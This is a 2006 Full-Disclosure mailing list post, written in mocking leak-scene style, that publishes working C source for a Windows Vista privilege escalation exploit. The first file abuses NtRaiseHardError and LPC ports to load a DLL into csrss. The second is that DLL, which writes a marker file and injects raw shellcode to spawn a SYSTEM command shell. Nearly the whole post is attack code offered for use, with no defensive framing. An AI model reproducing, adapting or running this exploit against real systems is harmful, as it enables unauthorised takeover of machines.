LOL VISTA EXPL0IT WAREZ LOL
From: <soundoftheunderground () hush com>
Date: Sun, 31 Dec 2006 16:55:59 -0600
-+- 0D4Y XCL00S1V3 -+- D0n7 0P3N T1LL XM4S -+- 0D4Y XCL00S1V3 -+- Introducing The Latest In Purloin3d Pr1v4t3 Pr0gg13z, Sn4tch3d S3kr1t Sh3llc0d3z & F1lch3d Furt1v3 F1l3z All new private^H^H^H^H^H^H^Hpublic exploit for a well known Vista hole. We warmly acknowledge erasmus for his generous and noble and unintentioned donation. Regrettably we award NO points for style but maximum points for effort and fair marks for dependability and timeliness. May Providence guide this happy coder to continue to ignore women and find comfort in his ugly, ugly, code. +++ //raise.c //26-12-2006 ]erasmus[/ORC //exploit NtRaiseHardError privesc and load dll into csrss //this version only is vista, other version can be worked //with proper offsets, i will complete them soon //imperfect but sometime work, ok for proto type;) //dll limit to 8 chars but maybe can work around by //\xxx\..\dll type trick and use LoadLibraryW, now is //C:\TEST but another drive maybe work #define offs1 0x30 #define offs2 0xBBD0 #include "windows.h" #include "stdio.h" DWORD(WINAPI*NtConnectPort)(PHANDLE,PWORD, PSECURITY_QUALITY_OF_SERVICE,PDWORD,PDWORD,PDWORD,PVOID, PDWORD); DWORD(WINAPI*NtQueryInformationProcess)(HANDLE,DWORD,PVOID, DWORD,PDWORD); DWORD(WINAPI*NtRaiseHardError)(DWORD,DWORD,DWORD,PVOID*, DWORD,PDWORD); HANDLE hl; HANDLE hs; DWORD sb; LPVOID lpc(LPCWSTR w){//cesar trick WORD n[4]; SECURITY_QUALITY_OF_SERVICE q; LPVOID p; DWORD d; DWORD c[6],s[3]; BYTE b[0x28]; n[0]=n[1]=wcslen(w)*2; *(PDWORD)(n+2)=(DWORD)w; memset(&q,0,sizeof(q)); q.Length=sizeof(q); p=NULL; d=0x1000; memset(&c,0,sizeof(c)); c[0]=sizeof(c); memset(&s,0,sizeof(s)); s[0]=sizeof(s); memset(&b,0,sizeof(b)); b[1]=1; hs=CreateFileMapping(INVALID_HANDLE_VALUE,NULL, PAGE_READWRITE,0,d,NULL); if(!hs)return NULL; p=MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0); if(!p)return NULL; c[1]=(DWORD)hs; c[3]=d; c[4]=(DWORD)p; d=sizeof(b); if(NtConnectPort(&hl,n,&q,c,s,NULL,&b,&d)) return NULL; sb=c[5]; return p; } HANDLE e1,e11; DWORD WINAPI 
tp1(LPVOID a){ LPVOID p[7]; DWORD d; p[0]=p+3; p[1]=p+5; p[2]=0; p[3]=(LPVOID)0x1B001AE; p[4]=L"\\??\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; p[5]=(LPVOID)0x100010; p[6]=L"erasmus1"; while(1){ WaitForSingleObject(e1,INFINITE); NtRaiseHardError(0x40000018,3,3,p,0,&d); SetEvent(e11); } return 0; } DWORD aaa,bbb; HANDLE e2,e22; DWORD WINAPI tp2(LPVOID a){ BYTE b[0xD8]; LPVOID p[7]; DWORD d; memset(&b,0,sizeof(b)); *(PDWORD)(b+0x3C)=2; *(PDWORD)(b+0x48)=1; *(PDWORD)(b+0x4C)=1; p[0]=p+3; p[1]=p+5; p[2]=0; p[3]=(LPVOID)0xD600D6; p[4]=&b; p[5]=(LPVOID)0x100010; p[6]=L"erasmus2"; while(1){ WaitForSingleObject(e2,INFINITE); memcpy(&b,"C:\\TEST",8); *(PDWORD)(b+0x08)=aaa; *(PDWORD)(b+0x0C)=bbb; *(PDWORD)(b+0x70)=aaa+0x100; *(PDWORD)(b+0x74)=aaa+0x100; NtRaiseHardError(0x40000018,3,3,p,0,&d); SetEvent(e22); } return 0; } STARTUPINFO cps; PROCESS_INFORMATION cpi; void w(DWORD a,DWORD d){ HWND h; aaa=d; bbb=a; SetEvent(e1); do{h=FindWindow(NULL,"erasmus1");}while(!h); CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NULL,&cps, &cpi); Sleep(100); SendMessage(h,WM_CLOSE,0,0); Sleep(100); SetEvent(e2); do{h=FindWindow(NULL,"erasmus2");}while(!h); TerminateThread(cpi.hThread,0); Sleep(100); CreateProcess(NULL,"notepad",NULL,NULL,0,0,NULL,NULL,&cps, &cpi); Sleep(100); SendMessage(h,WM_CLOSE,0,0); Sleep(100); } int main(int c,char**v){ char sd[MAX_PATH]; char dp[MAX_PATH]; WCHAR pp[MAX_PATH]; WCHAR pn[MAX_PATH]; HMODULE nt,kr,ad; DWORD se,cs,ws,u,d,h; HANDLE t; LPBYTE sc; GetSystemDirectory(sd,sizeof(sd)); sprintf(dp,"%s\\csrsrv.dll",sd); cs=(DWORD)LoadLibrary(dp); sprintf(dp,"%s\\winsrv.dll",sd); ws=(DWORD)LoadLibrary(dp); sprintf(dp,"%s\\ntdll.dll",sd); nt=LoadLibrary(dp); sprintf(dp,"%s\\kernel32.dll",sd); kr=LoadLibrary(dp); sprintf(dp,"%s\\advapi32.dll",sd); ad=LoadLibrary(dp); 
*(LPVOID*)&NtConnectPort=GetProcAddress(nt,"NtConnectPort"); *(LPVOID*)&NtQueryInformationProcess=GetProcAddress(nt, "NtQueryInformationProcess"); *(LPVOID*)&NtRaiseHardError=GetProcAddress(nt, "NtRaiseHardError"); if(2==c){ d=atoi(v[1]); if(!d){ printf("no args need\n"); return -1; } t=OpenProcess(PROCESS_ALL_ACCESS,0,d); if(!t){ printf("no args need\n"); return -1; } __asm mov eax,fs:[0x18] __asm mov eax,[eax+0x30] __asm mov eax,[eax+0x1D4] __asm mov se,eax if(se)swprintf(pp,L"\\Sessions\\%d\\Windows",se); else swprintf(pp,L"\\Windows"); swprintf(pn,L"%s\\ApiPort",pp); sc=(LPBYTE)lpc(pn); swprintf(pn,L"%s\\SbApiPort",pp); if(!sc)sc=(LPBYTE)lpc(pn); if(!sc)return -1; h=0; DuplicateHandle(GetCurrentProcess(),hs,t,(LPHANDLE)&h,0,0,2); WriteProcessMemory(t,&hs,&h,4,&d); WriteProcessMemory(t,&sb,&sb,4,&d); Sleep(INFINITE); }else{ STARTUPINFO cps; PROCESS_INFORMATION cpi; hs=sc=NULL; sb=0; memset(&cps,0,sizeof(cps)); cps.cb=sizeof(cps); cps.dwFlags=STARTF_USESHOWWINDOW; sprintf(sd,"\"%s\" %d",v[0],GetCurrentProcessId()); if(!CreateProcess(NULL,sd,NULL,NULL,0, CREATE_NEW_PROCESS_GROUP|CREATE_NEW_CONSOLE,NULL,NULL,&cps, &cpi)){ printf("spawn fail\n"); return -1; } Sleep(3000); if(!hs){ printf("lpc fail\n"); return -1; } sc=(LPBYTE)MapViewOfFile(hs,FILE_MAP_ALL_ACCESS,0,0,0); } memset(&cps,0,sizeof(cps)); cps.cb=sizeof(cps); cps.dwFlags=STARTF_USESHOWWINDOW; e1=CreateEvent(NULL,0,0,NULL); e11=CreateEvent(NULL,0,0,NULL); CreateThread(NULL,0,tp1,NULL,0,NULL); e2=CreateEvent(NULL,0,0,NULL); e22=CreateEvent(NULL,0,0,NULL); CreateThread(NULL,0,tp2,NULL,0,NULL); u=cs+offs2; *(PDWORD)(sc+offs1)=(DWORD)GetProcAddress(kr,"LoadLibraryA"); w(u,sb); Sleep(INFINITE); return 0; } //test.c //26-12-2006 ]erasmus[/ORC //dll for load in csrss by raise.c //repair csrss and create OWNED.TXT and try create system cmd //i can exec shell code in lpc shared section but LoadLibrary //is for work around of DEP on vista //also imperfect but also is proto type! 
//offsets is for vista #define offs1 0x5F89 #define offs2 0xBBD0 #define offs3 0xBBFC #define offs4 0x3F0CC #include "windows.h" LONG WINAPI uef(LPEXCEPTION_POINTERS a){ Sleep(INFINITE); return 0; } DWORD WINAPI tp(LPVOID a){ HMODULE kr,ws; BYTE b[0x100]; DWORD c,d; HANDLE h,t; kr=GetModuleHandle("kernel32"); ws=GetModuleHandle("winsrv"); h=OpenProcess(PROCESS_ALL_ACCESS,0,*(LPDWORD)((DWORD)ws+offs4)); c=(DWORD)VirtualAllocEx((HANDLE)h,NULL,sizeof(b),MEM_COMMIT,PAGE_EXE CUTE_READWRITE); d=(DWORD)GetProcAddress(kr,"CreateProcessA")-(c+69); memcpy(b,"\x33\xC0\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50\x 50\x50\xE8\x10\x00\x00\x00\x57\x69\x6E\x53\x74\x61\x30\x5C\x44\x65\x 66\x61\x75\x6C\x74\x00\x50\x6A\x44\x8B\xCC\x68\x63\x6D\x64\x00\x50\x 50\x50\x50\x54\x51\x50\x50\x50\x50\x50\x50\x83\xC1\xFC\x51\x50\xE8\x 00\x00\x00\x00\x83\xC4\x58\xC3",73); *(LPDWORD)(b+65)=d; WriteProcessMemory((HANDLE)h,(LPVOID)c,b,sizeof(b),&d); t=CreateRemoteThread((HANDLE)h,NULL,0,(LPTHREAD_START_ROUTINE)c,NULL ,0,NULL); WaitForSingleObject(t,INFINITE); return 0; } BOOL WINAPI DllMain(HANDLE a,DWORD dwReason,LPVOID c){ DWORD cs,d; LPDWORD p,f,l; HANDLE h; if(DLL_PROCESS_ATTACH==dwReason){ SetUnhandledExceptionFilter(uef); h=CreateFile("C:\\OWNED.TXT",GENERIC_WRITE,0,NULL, CREATE_ALWAYS,FILE_FLAG_WRITE_THROUGH,NULL); WriteFile(h,"greetz from csrss!\r\n",20,&d,NULL); CloseHandle(h); cs=(DWORD)GetModuleHandle("csrsrv"); *(LPDWORD)(cs+offs2)=0; __asm mov eax,esp __asm mov p,eax while(1){ if(cs+offs1==*p){ *p=(DWORD)ExitThread; d=p[1]+8; break; } p=p+1; } p=*(LPDWORD*)(cs+offs3)+2; f=p; while(d!=f[0])f=*(LPDWORD*)f; l=p; while(d!=l[1])l=*(LPDWORD*)(l+1); *(LPDWORD*)f=l; *(LPDWORD*)(l+1)=f; for(d=0;d<100;d=d+1){ p=(LPDWORD)HeapAlloc(GetProcessHeap(),0,0xD8); memset(p,0,0xD8); p[2]=(DWORD)p+0x08; p[3]=(DWORD)p+0x08; p[4]=(DWORD)p+0x10; p[5]=(DWORD)p+0x10; p[13]=0x240000; p[15]=1; p[16]=1; p[28]=(DWORD)p+0x78; p[29]=(DWORD)p+0x80; } p=(LPDWORD)GetProcessHeap(); while(1){ p=p+1; 
if(0x60005==*p&&p[1]>(DWORD)p&&p[1]<(DWORD)p+0x100&& !strcmp(*(LPSTR*)(p+1),"CSRSS")){ d=p[1]+6; while(1){ p=p-1; if(d-(DWORD)p==*p)break; } break; } } *(LPDWORD*)(cs+offs2)=p; Sleep(0); CreateThread(NULL,0,tp,NULL,0,NULL); } return TRUE; } Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/